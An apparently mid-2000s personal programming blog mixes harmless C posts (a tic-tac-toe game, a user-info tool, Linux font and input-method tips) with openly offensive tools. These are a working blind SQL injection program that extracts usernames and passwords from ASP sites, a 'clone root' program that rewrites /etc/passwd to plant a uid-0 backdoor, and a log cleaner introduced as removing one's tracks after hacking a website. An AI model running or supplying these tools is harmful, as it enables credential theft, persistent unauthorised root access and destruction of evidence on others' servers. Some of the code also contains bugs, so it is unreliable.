| dorainm's profiledorainm's spaceBlogLists |  Tools  Help |
|
April 25 a game#include "stdio.h" #include "malloc.h" #define SIZE 3 #ifndef FALSE #define FALSE 0 #endif #ifndef TRUE #define TRUE 1 #endif #define NONE 0 #define PLAYER_A 1 #define PLAYER_B 2 #define WARNNING 255 #define COMPETITOR 200 #define WINNER -1 char chessboard[SIZE][SIZE]; struct CHESS_MAN { int row; int col; }; /*get the value of current chess board: count and retrun how many ways the player can win the game*/ int get_value(int player) { int i,j,ret=0; int row,col,inc; int bNONE=FALSE; /*check the row*/ for(i=0;i<SIZE;i++) { row=SIZE; bNONE=FALSE; for(j=0;j<SIZE;j++) { /*if there is a competitor's chess man at the location sub row*/ if(chessboard[i][j]==player) row--; /*if there is any empty location in the row, set bNONE as TRUE*/ if(chessboard[i][j]==NONE) bNONE=TRUE; } /*computer : one empty and others are competitor's chess man, oh my god, danger, you may lose the game*/ if(row==1&&bNONE==TRUE) return WARNNING; /*computer : no competitor's chess man in the row, there is one way to make me win the game*/ else if(row==SIZE) ret++; } /*check the col*/ for(i=0;i<SIZE;i++) { col=SIZE; bNONE=FALSE; for(j=0;j<SIZE;j++) { if(chessboard[j][i]==player) col--; if(chessboard[j][i]==NONE) bNONE=TRUE; } /*computer : warnning : the competitor may be win the game*/ if(col==1&&bNONE==TRUE) return WARNNING; /*computer : this is my chance.*/ else if(col==SIZE) ret++; } /*check inc*/ inc=SIZE; bNONE=FALSE; for(i=0,j=0;i<SIZE;i++,j++) { if(chessboard[i][j]==player) inc--; if(chessboard[i][j]==NONE) bNONE=TRUE; } /*computer : i won't lose the game*/ if(inc==1&&bNONE==TRUE) return WARNNING; /*my chance?*/ else if(inc==SIZE) ret++; /*check inc*/ inc=SIZE; bNONE=FALSE; for(i=0,j=SIZE-1;i<SIZE;i++,j--) { if(chessboard[i][j]==player) inc--; if(chessboard[i][j]==NONE) bNONE=TRUE; } /*be careful*/ if(inc==1&&bNONE==TRUE) return WARNNING; /*another chance*/ else if(inc==SIZE) ret++; return ret; }; /*display the chess board*/ void disp_chess_board(void) { int i,j; /*print the head*/ for(i=0;i<SIZE*4+1;i++) printf("-"); printf("\n"); /*print the contect*/ for(i=0;i<SIZE;i++) { printf("|"); for(j=0;j<SIZE;j++) { if(chessboard[i][j]==PLAYER_A) printf(" o |"); else if(chessboard[i][j]==PLAYER_B) printf(" x |"); else printf(" |"); } printf("\n"); /*print the floor*/ for(j=0;j<SIZE*4+1;j++) printf("-"); printf("\n"); } return; }; /*init the chess board*/ void init_chess_board(void) { int i,j; for(i=0;i<SIZE;i++) for(j=0;j<SIZE;j++) chessboard[i][j]=NONE; return; }; int enter_chess_man(int row, int col, int player) { /*out of size*/ if(row>=SIZE||col>=SIZE) return FALSE; /*the pionted location is not empty*/ if(chessboard[row][col]!=NONE) return FALSE; /*okay, put down the chess man*/ chessboard[row][col]=player; return TRUE; }; /*check whetch the player win the game*/ int chk_winner(int player) { int i,j; int col,row,inc; /*are there all the player's chess men in the same row*/ for(i=0;i<SIZE;i++) { row=TRUE; for(j=0;j<SIZE;j++) { if(chessboard[i][j]!=player) row=FALSE; } if(row==TRUE) return TRUE; } /*are there all the player's chess men in the same col*/ for(i=0;i<SIZE;i++) { col=FALSE; for(j=0;j<SIZE;j++) { if(chessboard[j][i]!=player) col=FALSE; } if(col==TRUE) return TRUE; } /*what about the inc*/ inc=TRUE; j=0; for(i=0;i<SIZE;i++) if(chessboard[i][i+j]!=player) inc=FALSE; if(inc==TRUE) return TRUE; /*and this?*/ inc=TRUE; j=SIZE-1; for(i=0;i<SIZE;i++) if(chessboard[i][j-i]!=player) inc=FALSE; if(inc==TRUE) return TRUE; /*sorry, the player has not won yet.*/ return FALSE; }; /*get the best chess man for player*/ int get_best_chess(struct CHESS_MAN *best_chess, int player, int other) { int tat_num=SIZE*SIZE; int chess_value[tat_num]; struct CHESS_MAN chess[tat_num]; int i,j,cur=0; /*init chess[]*/ for(i=0;i<SIZE;i++) { for(j=0;j<SIZE;j++) { chess[cur].row=i; chess[cur++].col=j; } } /*when i take one of the chess man, what's the chess_value of my competitor i will choose the min value, because it means that's the worst case for him*/ for(i=0;i<tat_num;i++) { /*i try to take this chess_man*/ if(enter_chess_man(chess[i].row,chess[i].col,player)==TRUE) { chess_value[i]=get_value(other); /**/ if(chk_winner(player)==TRUE) chess_value[i]=WINNER; chessboard[chess[i].row][chess[i].col]=NONE; } else /*can not take, means that chess_board has layed my cpmpetitor's chess_man*/ chess_value[i]=COMPETITOR; } /*choose the lowest chess_value*/ cur=0; for(i=0;i<tat_num;i++) { if(chess_value[cur]>chess_value[i]) cur=i; } /*my best is my competitor's worst*/ best_chess->row=chess[cur].row; best_chess->col=chess[cur].col; return chess_value[cur]; }; int chk_full(void) { int i,j; for(i=0;i<SIZE;i++) for(j=0;j<SIZE;j++) if(chessboard[i][j]==NONE) return FALSE; return TRUE; }; int main(void) { int i; struct CHESS_MAN best_chess; int player=PLAYER_A; int competitor=PLAYER_B; int bEND=FALSE; /*whetch need end of the program*/ int row,col; /*user's input location*/ //best_chess=(struct CHESS_MAN*)malloc(sizeof(struct CHESS_MAN)); init_chess_board(); disp_chess_board(); while(bEND==FALSE) { if(player==PLAYER_A) { /*user's turn*/ do { printf("] Input your chess location : \n"); printf("] location > row : "); scanf("%d",&row); printf("] location > col : "); scanf("%d",&col); if(enter_chess_man(row-1,col-1,player)==TRUE) { printf("] You have take chess man at [%d][%d]\n",row,col); break; } else printf("] Error : You put the chess to a wrong location\n"); }while(TRUE); } else { /*computer says : it is my turn.*/ get_best_chess(&best_chess,player,competitor); enter_chess_man(best_chess.row,best_chess.col,player); printf("] Player %d put chess at [%d][%d]\n",player,best_chess.row+1,best_chess.col+1); } /*display the current chess board*/ disp_chess_board(); /*anybody win?!*/ bEND=TRUE; if(chk_winner(player)) printf("] Player %d Win the Game.\n",player); else if(chk_winner(competitor)) printf("] Player %d Win the Game.\n",competitor); else if(chk_full()) printf("] No One Win the Game.\n"); else bEND=FALSE; /*change the turn of the players*/ competitor=player; if(player==PLAYER_A) player=PLAYER_B; else player=PLAYER_A; }; printf("\n\nthe command completed successfully.\n\n"); return 0; }; March 30 Web SQL Injection to ASP for Linux/*************************************************************************** * * Web SQL Injection * copyright (C) 2005 by dorainm * mail: dorainm@gmail.com * MSN: dorainm@hotmail.com * version 0.1.0 * **************************************************************************** * * ### * ## ## * ## * #### ##### ## ### #### ### ## ### ### ## * ## ## ## ## ### ## ## ## ## ## ####### * ## ## ## ## ## ## ##### ## ## ## ## # ## * ## ## ## ## ## ## ## ## ## ## ## # ## * ## ## ## ## ## ## ## ## ## ## ## # ## * #### ## ##### #### ### ## #### ## ## ## ## * **************************************************************************** * * This program is free software; you can redistribute it and/or modify it * * the program can get the html code by the URL * * If you have better opinions about this program, please contact me. * My MSN is dorainm@hotmail.com, and mail is dorainm@gmail.com * ****************************************************************************/ #include "stdio.h" #include "string.h" #include "stdarg.h" #include "sys/socket.h" #include "netinet/in.h" #include "netdb.h" #define PRECISION 5 #define MAX_LENGTH 255 #define MAX_BUF 1024 #define MAX_FLIED_LENGTH 34 #define ASCII 127 #define TABLE_FILE "table.txt" #define USER_FILE "user.txt" #define PSWD_FILE "pswd.txt" /* int htconnect( //connect to the web site server machine. char *domain, //the web server's address: URL or IP int port) //the port of the web server, default value : 80 */ int htconnect(char *domain,int port) { int white_sock; struct hostent * site; struct sockaddr_in me; site=gethostbyname(domain); if(site==NULL) return -2; white_sock=socket(AF_INET,SOCK_STREAM,0); if(white_sock<0) return -1; memset(&me,0,sizeof(struct sockaddr_in)); memcpy(&me.sin_addr,site->h_addr_list[0],site->h_length); me.sin_family=AF_INET; me.sin_port=htons(port); return (connect(white_sock,(struct sockaddr *)&me,sizeof(struct sockaddr))<0)?-1:white_sock; }; /* int htsend( //send the uri to the website server int sock, //the sock which has connected to the website server by function "ntconnect" char *fmt,...) //the uri which should send to the website server. */ int htsend(int sock,char *fmt,...) { char BUF[MAX_BUF]; va_list argptr; va_start(argptr,fmt); vsprintf(BUF,fmt,argptr); va_end(argptr); return send(sock,BUF,strlen(BUF),0); }; /* int clow( //set all the letters in the string to low char *string, //the string int str_length) //the length of the string */ int clow(char *string, int str_length) { int i; for(i=0;i<str_length;i++) { if(*(string+i)>='A'&&*(string+i)<='Z') { *(string+i)=*(string+i)-'A'+'a'; } } return 0; }; /* int fillzero( //fill '0' to all the charactors in the string char *string, //the string int str_length) //the length of the string */ int fillzero(char *string,int str_length) { int i; for(i=0;i<=str_length;i++) { *(string+i)=0; } return 0; }; /* int getItem( //get the hostname and uri from the URL address string char *string, //the URL address string char **hostname, //the first memry address which will store the string 'hostname' char **uri) //the first memry address which will store the string 'uri' */ int getItem(char *string, char **hostname, char **uri) { clow(string,strlen(string)); int n0=0,i; char *temp=string; if(strncmp(string,"http://",7)==0) { temp=string+7; } i=strlen(temp); for(n0=0;n0<i;n0++) { if(*(temp+n0)=='/') break; } *hostname=(char*)malloc(n0+1); fillzero(*hostname,n0+1); for(i=0;i<n0;i++) { *(*hostname+i)=*(temp+i); } *(*hostname+n0)='\0'; if(strlen(temp)>n0) { *uri=temp+n0; } else { *uri=(char*)malloc(2); *(*uri)='/'; *(*uri+1)='\0'; } return 0; }; /* unsigned long getLong( //get the length of the uri from the website server char *hostname, //the hostname of the website server char *fmt,...) //the uri which should send to the website server. */ unsigned long getLong(char *hostname, char *url) { /*char url[MAX_BUF]; va_list argptr; va_start(argptr,fmt); vsprintf(url,fmt,argptr); va_end(argptr);*/ int black_sock; int i=0; unsigned long j=0; char bugs_bunny[3]; black_sock=htconnect(hostname,80); if(black_sock==-1) { printf("[-] Error : set up a socket.\n"); return 0; } if(black_sock==-2) { printf("[-] Connected to %s...Fail\n",hostname); return 0; } htsend(black_sock,"GET %s HTTP/1.0\r\n",url); htsend(black_sock,"Host:%s\r\n",hostname,10); htsend(black_sock,"\r\n",10); while(read(black_sock,bugs_bunny,1)>0) { j++; } close(black_sock); //printf("%s = %d\n",url,j); return j; }; /* int cmpURI( //compare whether the result of sending the new uri equal the input length unsigned long source_length, //the input length, default value is the source length char *hostname, //hostname of the website server char *fmt,...) //the uri which should send to the website server. */ int cmpURI(unsigned long source_length, char *hostname, char *fmt,...) { char check_uri[MAX_BUF]; va_list argptr; va_start(argptr,fmt); vsprintf(check_uri,fmt,argptr); va_end(argptr); unsigned long i,j; i=getLong(hostname,check_uri); j=strlen(check_uri)*PRECISION; if(source_length>i-j&&source_length<i+j) { return 0; } else { return 1; } }; int checkSI(unsigned long source_length, char *hostname, char *uri) { if(cmpURI(source_length,hostname,"%s%%20and%%201=1",uri)==1) return 1; if(cmpURI(source_length,hostname,"%s%%20and%%201=2",uri)==0) { return 1; } else { return 0; } }; int checkDB(unsigned long source_length, char *hostname, char *uri) { if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20count(*)%%20from%%20msysobjects%%20)>0",uri)==0) return 1; else return 0; }; int getFliedLength(unsigned long source_length, char *hostname, char *uri, char *table, char *user_flied) { int max_len=MAX_FLIED_LENGTH; int cur_len=max_len/2; int top_val=0,bot_val=max_len; while(top_val!=cur_len) { if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20top%%201%%20len([%s])%%20from%%20[%s]%%20)>=%d",uri,user_flied,table,cur_len)==0) { /*printf("leng >= %d (%d:%d:%d)\n",cur_len,top_val,cur_len,bot_val);*/ top_val=cur_len; cur_len=(cur_len+bot_val)/2; } else { //printf("leng < %d (%d:%d:%d)\n",cur_len,top_val,cur_len,bot_val); bot_val=cur_len; cur_len=(cur_len+top_val)/2; } } //printf("leng = %d (%d:%d:%d)\n",cur_len,top_val,cur_len,bot_val); if(cur_len==MAX_FLIED_LENGTH) return 0; else return cur_len; }; int getFliedValue(unsigned long source_length, char *hostname, char *uri, char *table, char *flied_name, int flied_length, char **flied_value) { *flied_value=(char *)malloc(flied_length); fillzero(*flied_value,flied_length); int max_val=ASCII,i; int cur_val=max_val/2; int top_val=0,bot_val=max_val; for(i=0;i<flied_length;i++) { cur_val=max_val/2; top_val=0,bot_val=max_val; while(top_val!=cur_val) { //printf("%s%%20and%%20(select%%20top%%201%%20asc(mid([%s],%d,1))%%20from%%20[%s]%%20)>=%d\n",uri,flied_name,i,table,cur_val); if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20top%%201%%20asc(mid([%s],%d,1))%%20from%%20[%s]%%20)>=%d",uri,flied_name,i+1,table,cur_val)==0) { //printf("value >= %d (%d:%d:%d)\n",cur_val,top_val,cur_val,bot_val); top_val=cur_val; cur_val=(cur_val+bot_val)/2; } else { //printf("value < %d (%d:%d:%d)\n",cur_val,top_val,cur_val,bot_val); bot_val=cur_val; cur_val=(cur_val+top_val)/2; } } *(*flied_value+i)=cur_val; printf("[+] The [%d] charactor is [%c]\n",i,cur_val); } return 0; }; int checkTable(unsigned long source_length, char *hostname, char *uri, char **table) { FILE *fp; char buffer[MAX_BUF]; int bGet=0,table_length=0; if((fp=fopen(TABLE_FILE,"r"))==NULL) { return 1; } while((!feof(fp))&&bGet==0) { fscanf(fp,"%s\n",buffer); if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20count(*)%%20from%%20[%s]%%20)>0",uri,buffer)==0) bGet=1; } if(bGet==0) return 2; table_length=strlen(buffer); *table=(char*)malloc(table_length+1); fillzero(*table,table_length+1); strncpy(*table,buffer,table_length); fclose(fp); return 0; }; int checkUser(unsigned long source_length, char *hostname, char *uri, char *table, char **user) { FILE *fp; char buffer[MAX_BUF]; int bGet=0,user_length=0; if((fp=fopen(USER_FILE,"r"))==NULL) { return 1; } while((!feof(fp))&&bGet==0) { fscanf(fp,"%s\n",buffer); if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20count([%s])%%20from%%20[%s]%%20)>0",uri,buffer,table)==0) bGet=1; } if(bGet==0) return 2; user_length=strlen(buffer); *user=(char*)malloc(user_length+1); fillzero(*user,user_length+1); strncpy(*user,buffer,user_length); fclose(fp); return 0; }; int checkPswd(unsigned long source_length, char *hostname, char *uri, char *table, char **pswd) { FILE *fp; char buffer[MAX_BUF]; int bGet=0,pswd_length=0; if((fp=fopen(PSWD_FILE,"r"))==NULL) { return 1; } while((!feof(fp))&&bGet==0) { fscanf(fp,"%s\n",buffer); if(cmpURI(source_length,hostname,"%s%%20and%%20(select%%20count([%s])%%20from%%20[%s]%%20)>0",uri,buffer,table)==0) bGet=1; } if(bGet==0) return 2; pswd_length=strlen(buffer); *pswd=(char*)malloc(pswd_length+1); fillzero(*pswd,pswd_length+1); strncpy(*pswd,buffer,pswd_length); fclose(fp); return 0; }; void usage(char *app_name) { printf("Usage :\t%s <URL>\n",app_name); return; }; void welcome(void) { printf("=====================================================================\n"); printf("------ Web SQL Injecter v0.1.0 by dorainm dorainm@gmail.com ------\n"); printf("=====================================================================\n"); return; }; void showend(void) { printf("\nthe command completed successfully.\n\n"); return; }; int main(int argc, char **argv) { char *hostname; char *uri; unsigned long source_length; char *table; char *user; char *pswd; int user_length; char *user_value; int pswd_length; char *pswd_value; welcome(); if(argc<2) { usage(argv[0]); showend(); return 1; } /*get the hostname and the uri content*/ getItem(argv[1],&hostname,&uri); printf("[+] Get host name : %s\n",hostname); printf("[+] Get URI content : %s\n",uri); /*check whether the url can be injected?!*/ printf("[+] Check the URL can be injected ...\n"); source_length=getLong(hostname,uri); if(checkSI(source_length, hostname, uri)!=0) { printf("[-] the URL can NOT be injected.\n"); showend(); return 2; } printf("[+] this URL can [ be injected ].\n"); /*check the type of database*/ printf("[+] Check the type of the database...\n"); if(checkDB(source_length, hostname, uri)==1) { printf("[+] Type of the database is [ SQL Server ]\n"); } else { printf("[+] Type of the database is [ Access ]\n"); } /*check the table name*/ printf("[+] Check the table name from list...\n"); if(checkTable(source_length, hostname, uri, &table)!=0) { printf("[-] Can not find the table name.\n"); showend(); return 3; } printf("[+] The table [%s] is exsit.\n",table); /*check the user flied name from the table*/ printf("[+] Check the user flied from list...\n"); if(checkUser(source_length, hostname, uri, table, &user)!=0) { printf("[-] Can not find the user flied.\n"); showend(); return 4; } printf("[+] The user flied [%s] is exsit.\n",user); printf("[+] Get the value from the user flied...\n"); if((user_length=getFliedLength(source_length, hostname, uri, table, user))==0) { printf("[-] Can not get the length of user values.\n"); showend(); return 5; } printf("[+] Get the length of the user value is [ %d ]\n",user_length); printf("[+] Get the value from the user flied...\n"); getFliedValue(source_length, hostname, uri, table, user, user_length, &user_value); printf("[+] Get the value of the flied user is [ %s ]\n",user_value); /*check the password flied name from the table*/ printf("[+] Check the password flied from list...\n"); if(checkPswd(source_length, hostname, uri, table, &pswd)!=0) { printf("[-] Can not find the password flied.\n"); showend(); return 4; } printf("[+] The password flied [%s] is exsit.\n",pswd); printf("[+] Get the value from the password flied...\n"); if((pswd_length=getFliedLength(source_length, hostname, uri, table, pswd))==0) { printf("[-] Can not get the length of password values.\n"); showend(); return 5; } printf("[+] Get the length of the password value is [ %d ]\n",pswd_length); printf("[+] Get the value from the password flied...\n"); getFliedValue(source_length, hostname, uri, table, pswd, pswd_length, &pswd_value); printf("[+] Get the value of the flied password is [ %s ]\n",pswd_value); printf("[+] All Finished.\n"); printf("[+] Get the username [ %s ] and the password [ %s ].\n",user_value,pswd_value); showend(); return 0; } January 01 reset the file time#include "stdio.h" #include "stdlib.h" #include "windows.h" void version(void) { printf("\nset FileTime v0.1\tby dorainm\tdorainm@gmail.com\n\n"); }; void usage(char *app_name) { printf(""Usage:\t%s OldFile NewFile\n\n",app_name); } int main(int argc,char* argv[]) { HANDLE hFileOld,hFileNew; FILETIME OcreateTime,OLastAccessTime,OLastWriteTime; const FILETIME *pCreationTime,*pLastAccessTime,*pLastWriteTime; version(); if (argc!=3) { usage(argv[0]); return 1; } else { hFileOld = createFile(argv[1],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFileOld==INVALID_HANDLE_VALUE) { printf("Cannot open %s. Error:%x\n\n",argv[1],GetLastError()); return 2; } hFileNew=createFile(argv[2],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if(hFileNew==INVALID_HANDLE_VALUE) { printf("Cannot open %s. Error:%x\n\n",argv[2],GetLastError()); return 3; } GetFileTime(hFileOld ,&OcreateTime,&OLastAccessTime,&OLastWriteTime); pCreationTime = &OcreateTime; pLastAccessTime = &OLastAccessTime; pLastWriteTime = &OLastWriteTime; SetFileTime(hFileNew,pCreationTime,pLastAccessTime,pLastWriteTime); CloseHandle(hFileNew); CloseHandle(hFileOld); printf("All Done. Good Luck\n\n"); } return 0; } How to install the "fcitx" chinese input methodin the Fedora Core 4 Linux o.s. step 1: uninstall the chinese input method which the o.s. owns. rpm -qa iiim* | xargs rpm -e --nodeps rpm -qa miniChinput* | xargs rpm -e --nodeps step 2: install the "fcitx" input method. >if you download a .gz file #tar xzvf fcitx*.gz #cd fcitx* #./configure #make #make install >if you download a .rpm file #rpm -ivh fcitx*.rpm step 3: set the "fcitx" input method autorun when account login. append the command "fcitx&" to /etc/X11/xinit/xinitrc.d/xinput.sh file. ------------------------------------------------------------------------------------------------- ps: fcitx can't run when the language was set as english. install fontevery knows, that in linux o.s. , the chinese charators can't be displayed very correctly. now i show a method that how to install the font file in the linux. first, copy the font step to /usr/share/fonts/zh_CN/TrueType/ second, with "su" command, run as root third, ttmkfdir -d /usr/share/fonts/zh_CN/TrueType/ -o /usr/share/fonts/zh_CN/TrueType/fonts.scale and now, you can see the new font in the font list, and you can change the system font. i use the "simsun" to display the chinese charactors and "tahoma" to the english. but the forum refuse the attach file which size is larger than 5000kb, so i just upload these font file, but you can find them in windows operation system or other places. ps: maybe you will found that the path is "/usr/share/fonts/chinese/TrueType/" in your o.s. clone root for linux by FILEclone root for linux we know the most easy method to make a backdoor is that create/edit a account with uid=0. the program can edit the pointed account's uid to "ZERO". in this way, the account can be known as root. ---------------------------------- clone_root.c ------------------------------------ #include "stdio.h" #include "string.h" #define MAXBUF 256 int main(int argc, char *argv[]) { FILE *fp,*mfp; //two file piont char buf[MAXBUF]; //buffer int bIn; //whether the account existed. char accountname[MAXBUF]; //the accountname with the end of ":" char *filename[]={"/etc/passwd","./tmp_cr"}; //two files' name /*display the logo of the program*/ printf("\nclone root version 1.0\t\tby dorainm\tdorainm@gmail.com"); printf("\n--------------------------------------------------------------------------"); printf("\nmake sure that you run this program as root\n"); printf("\tor your account can write the passwd file"); /*display the usage when the wrong arguments*/ if(argc!=2){ printf("\nUsage:\t%s username\n\n",argv[0]); exit(1); } /*append the char ":" to the end of the accountname, in this way, we can check whether the account is existed accurately. or, there will be no differents between the account "example1" and "example2" when we clone the account "example"*/ strcpy(accountname,argv[1]); strcat(accountname,":"); /*check whether can open the "passwd" file*/ if((fp=fopen(filename[0],"r"))==NULL){ printf("\nError: can not open the file %s.\n\n",filename[0]); exit(2); } /*check whether can create the "temp" file*/ if((mfp=fopen(filename[1],"w"))==NULL){ printf("\nError: can not creat the tmp file %s.\n\n",filename[1]); exit(3); } /*initialized the variable "bIn"; check the account AccountName&":" already be existed or not. read one line in the "passwd" file, if the pointed account name is included in this line, replace it with the new line, or copy the old line to the new one*/ bIn=0; while(fgets(buf,MAXBUF,fp)!=NULL){ if(strstr(buf,accountname)){ bIn=1; fprintf(mfp,"%s:!:0:0:%s:/root:/bin/sh\n",argv[1],argv[1]); }else{ fprintf(mfp,"%s",buf); } } /*close the file pointers*/ fclose(fp); fclose(mfp); /*when the account is not existed, display the error messang and remove the temp file*/ if(bIn==0){ printf("\nError: the account \"%s\" is not existed.\n\n",argv[1]); system("rm ./tmp_cr"); exit(4); } /*congratulations, replace the passwd file, and now the pointed account is know as "root"*/ system("mv ./tmp_cr /etc/passwd"); printf("\nclone the account \"%s\" is completed successfully.\n\n",argv[1]); return 0; } --------------------------------- end of file --------------------------------- [root@dorainm clone_root]# ./clone_root clone root version 1.0 by dorainm dorainm@gmail.com -------------------------------------------------------------------------- make sure that you run this program as root or your account can write the passwd file Usage: ./clone_root username Clear httpd logsHacked one website, the most important thing is removed your tracks. here is a example, about how to clear your IP in the web serive's logs. -----------------------------clear_ip.c--------------------------------------- #include "stdio.h"j #include "fcntl.h" #include "utmp.h" #include "sys/types.h" #include "unistd.h" #include "lastlog.h" #include "pwd.h" #define HTTPDA "/etc/httpd/logs/access_log" #define HTTPDE "/etc/httpd/logs/error_log" #define MAXBUFF 8*1024 int main(int argc, char *argv[]) { int i,size; FILE *pfile; FILE *pfile2; char *varlogs[]={HTTPDA,HTTPDE}; char *newlogs[]={"httpda.hm","httpde.hm"}; char buffer[MAXBUFF]; char host_ip[17]; /*usage of the program*/ if(argc!=2) { printf("\n\n"); fprintf(stderr,"Clear web service log\t\tby dorainm dorainm@gmail.com\n\n"); fprintf(stderr,"usage:\t%s <IP>\n\n",argv[0]); exit(1); } strcpy(host_ip,argv[1]); i=0; while(i<2) { printf("Processing %s\t",varlogs); pfile=fopen(varlogs,"r"); if(!pfile) { printf("Can't open %s\n\n",varlogs); i++; continue; } pfile2=fopen(newlogs,"w"); if(!pfile2) { printf("Can't create backup file %s\n\n",newlogs); i++; continue; } else { while(fgets(buffer,MAXBUFF,pfile)!=NULL) { if(!strstr(buffer,host_ip)) { fputs(buffer,pfile2); } } } fclose(pfile); fclose(pfile2); printf("Done\n"); i++; } printf("\n"); system("mv httpda.hm /etc/httpd/logs"); system("mv httpde.hm /etc/httpd/logs"); printf("\n"); printf("Your tracks have been removed\n\n"); printf("Exiting program !!\n\n"); exit(0); } display the user informationevery body knows that in windows operation, there is an command "net user username" to display the user information. now here is a program for linux to display the user informations. if run as root, you can got more infor. from the shadow file. /**************************************************************************** * display the user information * copyright (C) 2005 by dorainm * dorainm@gmail.com * dorainm@hotmail.com * version 1.0 * * This program is free software; you can redistribute it and/or modify it * * This program can display the account's informations * * If you have better opinions about this program, please contact me. * My msn is dorainm@hotmail.com, and mail is dorainm@gmail.com **************************************************************************** #include "/usr/include/psd.h" struct passwd { char *pw_name; //Username. char *pw_passwd; //Password. __uid_t pw_uid; //User ID. __gid_t pw_gid; //Group ID. char *pw_gecos; //Real name. char *pw_dir; //Home directory. char *pw_shell; //Shell program. }; ***** Search for an entry with a matching user ID. This function is a possible cancellation point and therefore not marked with __THROW. extern struct passwd *getpwuid (__uid_t __uid); ****** Search for an entry with a matching username. This function is a possible cancellation point and therefore not marked with __THROW. extern struct passwd *getpwnam (__const char *__name); *************************************************************************** #include "/usr/include/grp.h" struct group { char *gr_name; //Group name. char *gr_passwd; //Password. __gid_t gr_gid; //Group ID. char **gr_mem; //Member list. }; ****** Search for an entry with a matching group ID. This function is a possible cancellation point and therefore not marked with __THROW. extern struct group *getgrgid (__gid_t __gid); ****** Search for an entry with a matching group name. This function is a possible cancellation point and therefore not marked with __THROW. extern struct group *getgrnam (__const char *__name); *************************************************************************** #include "/usr/include/shadow.h" struct spwd { char *sp_namp; //Login name. char *sp_pwdp; //Encrypted password. long int sp_lstchg; //Date of last change. long int sp_min; //Minimum number of days between changes. long int sp_max; //Maximum number of days between changes. long int sp_warn; //Number of days to warn user to change the password. long int sp_inact; //Number of days the account may be inactive. long int sp_expire; //Number of days since 1970-01-01 until account expires. unsigned long int sp_flag; //Reserved. }; ****** Get shadow entry matching NAME. This function is not part of POSIX and therefore no official cancellation point. But due to similarity with an POSIX interface or due to the implementation it is a cancellation point and therefore not marked with __THROW. extern struct spwd *getspnam (__const char *__name); ****************************************************************************/ #include "stdio.h" #include "pwd.h" #include "string.h" #include "grp.h" #include "shadow.h" #define MAXLEN 255 void usage(char *exe_name) { printf("Usage:\t%s -i uid | -n name | -v | --version | -h | --help\n\n",exe_name); return; }; void version(void) { printf("display the user information 1.0\n"); printf("copyright (C) 2005 dorainm\n"); printf("This is free software; see the source for copying conditions. There is NO\n"); printf("warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n\n"); return; }; int str2int(char in_str[]) { int str_len,str_int=0; int i; str_len=strlen(in_str); for(i=0;i<str_len;i++){ if(in_str>47&&in_str<58) str_int=str_int*10+in_str-48; else return -1; } return str_int; }; int main(int argc,char *argv[]) { struct passwd *pw; struct group *grp; struct spwd *spw; //display the usage printf("display the user information\tby dorainm\tdorainm@gmail.com\n"); printf("----------------------------------------------------------------------------\n"); if(argc==1){ usage(argv[0]); exit(1); } if(argc==2){ //display the verson of this program if(!strcmp(argv[1],"-v")||!strcmp(argv[1],"--version")){ version(); exit(3); } //display the help information usage(argv[0]); exit(2); } //get the pw from passwd //by the user name if(!strcmp(argv[1],"-n")){ if((pw=getpwnam(argv[2]))==NULL){ printf("the user with name [ %s ] can not be found\n\n",argv[2]); exit(4); } } //by the uid else if(!strcmp(argv[1],"-i")){ int u_uid; u_uid=str2int(argv[2]); if((pw=getpwuid(u_uid))==NULL){ printf("the user with uid [ %s ] can not be found\n\n",argv[2]); exit(5); } }else{ usage(argv[0]); exit(1); } printf("Username: %s\n",pw->pw_name); printf("Password: %s\n",pw->pw_passwd); printf("User ID: %d\n",pw->pw_uid); printf("Group ID: %d\n",pw->pw_gid); if(grp=getgrgid(pw->pw_gid)){ printf("Group name: %s\n",grp->gr_name); } printf("Real name: %s\n",pw->pw_gecos); printf("Home directory: %s\n",pw->pw_dir); printf("Shell program: %s\n",pw->pw_shell); if(getuid()!=0){ printf("******************************************\n"); printf("can not read the shadow information: run as root\n\n"); exit(6); }else{ spw=getspnam(pw->pw_name); if(spw==NULL){ printf("******************************************\n"); printf("the shadow information can not be found\n\n"); exit(7); } printf("Encrypted password: %s\n",spw->sp_pwdp); printf("Date of last change: %d\n",spw->sp_lstchg); printf("Minimum number of days between changes: %d\n",spw->sp_min); printf("Maximum number of days between changes: %d\n",spw->sp_max); printf("Number of days to warn user to change the password: %d\n",spw->sp_warn); printf("Number of days the account may be inactive: "); if(spw->sp_inact==-1) printf("never\n"); else printf("%d\n",spw->sp_inact); printf("Date of the account expires :"); if(spw->sp_expire==-1) printf("never\n"); else printf("%d\n",spw->sp_expire); printf("Reserved: %u\n",spw->sp_flag); } printf("\n"); return 0; } change the ftp account's password in the command linein the command line, input the command "ftp", to enter to the ftp command line ftp>open 192.168.0.2 Connected to 192.168.0.2 # it means that you connected to the ftp site, # and there are some welcome message displayed here. User (ftp.szele.net:(none)):dorainm # enter the username 331 User name okay, need password. Password: # enter the password 230 User logged in, proceed. # it means that the account has logged in successfully. # then input the command to change the password. ftp> quote site pswd old_password new_password 230 Password changed okay. # the password has been changed successfully. 530 Cannot change password. # if you see these words, maybe you have not enough authority. hello, worldtoday, my space has been "born". and i just want to say one sentence such as my job, a programmer. "hello, world" ----------------- dorainm ivy mail: dorainm@gmail.com MSN: dorainm@hotmail.com |
|
|
